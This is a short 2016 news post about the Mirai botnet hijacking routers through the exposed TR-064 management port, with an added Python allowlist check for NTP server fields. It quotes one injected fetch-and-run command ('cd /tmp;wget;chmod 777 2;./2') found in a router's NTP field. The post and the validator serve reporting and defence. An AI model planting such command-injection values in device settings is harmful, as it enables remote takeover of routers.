New Mirai attack vector – bot exploits a recently discovered router vulnerability

 ( toMpEr | Tuesday, November 29, 2016 - 1:16 )

The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget;chmod 777 2;./2
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also known as LAN-Side DSL CPE Configuration.
On some modems and routers TR-064 is publicly available to the outside world. It means that any internet user can command those devices to, for example, change DNS or NTP settings.

In Hungary, the affected port 7547 is reachable from the Internet on 176157 IPs.
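
An added example, not part of the original post: an allowlist check that a config-audit tool could apply to a router's NTP server field, run here against the value quoted above. The field names (`NTPServer1` etc.) and the sample config dump are assumptions constructed for illustration.

```python
import ipaddress
import re
import string

# One DNS label (RFC 1123): letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
# Characters that can legitimately appear in a hostname or an IP literal.
_ALLOWED = set(string.ascii_letters + string.digits + "-.:")


def is_valid_ntp_server(value):
    """Allowlist check: True only for an IP literal or a syntactically valid hostname."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    # fullmatch (not match with '$') so a trailing newline cannot slip through.
    return all(_LABEL.fullmatch(label) for label in value.rstrip(".").split("."))


def audit_ntp_fields(config):
    """Return (field, value, unexpected characters) for every rejected NTP entry."""
    findings = []
    for field, value in config.items():
        if not field.lower().startswith("ntpserver") or value == "":
            continue  # not an NTP field, or an unset slot
        if not is_valid_ntp_server(value):
            unexpected = "".join(sorted(set(value) - _ALLOWED))
            findings.append((field, value, unexpected))
    return findings


# Constructed config dump; field names are assumed, not taken from the post.
SAMPLE_CONFIG = {
    "NTPServer1": "cd /tmp;wget;chmod 777 2;./2",  # the entry quoted in the post
    "NTPServer2": "pool.ntp.org",
    "NTPServer3": "192.0.2.10",
    "NTPServer4": "",
    "DNSServer1": "198.51.100.53",
}

if __name__ == "__main__":
    for field, value, unexpected in audit_ntp_fields(SAMPLE_CONFIG):
        print(f"{field}: rejected {value!r} (unexpected characters: {unexpected!r})")
```

Rejecting by allowlist rather than searching for known shell metacharacters means the check does not depend on which shell or quoting the device uses when it passes the field on.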



900,000 Routers Knocked Offline in Germany amid Rumors of Cyber-Attack

UPDATE 5: Malware experts at Kaspersky Lab have also confirmed a version of the Mirai IoT malware is behind the attacks on Deutsche Telekom routers.